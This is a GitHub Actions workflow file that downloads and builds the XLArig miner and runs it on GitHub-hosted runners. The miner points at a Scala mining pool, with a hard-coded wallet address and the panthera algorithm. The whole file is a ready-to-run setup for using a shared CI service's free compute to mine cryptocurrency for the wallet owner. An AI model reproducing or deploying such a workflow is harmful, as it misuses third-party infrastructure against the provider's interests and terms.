name: Mine Scala via GitHub Actions

on:
  workflow_dispatch:

jobs:
  mine:
    runs-on: ubuntu-latest
    steps:
    - name: Install dependencies
      run: |
        sudo apt-get update
        sudo apt-get install -y wget tar build-essential cmake libuv1-dev libssl-dev libhwloc-dev

    - name: Download XLArig v5.2.4
      run: |
        wget https://github.com/scala-network/XLArig/archive/refs/tags/v5.2.4.tar.gz
        tar -xvzf v5.2.4.tar.gz
        cd XLArig-5.2.4
        mkdir build && cd build
        cmake ..
        make
      continue-on-error: false

    - name: Start Mining
      run: |
        cd XLArig-5.2.4/build
        ./xlarig -o pool.scalaproject.io:2019 -u Ssy2SFtR3rGfjKFA4xxUnGVikpSy7GyfTFbDmjyqSGsuJMJ4K2GSKyK6pApbCy7DBGgf6b5p3fHwV1zHrnVRUjDG7kdm496A8R -p github -a panthera -k --tls
      env:
        XLARIG_LOG_LEVEL: 2
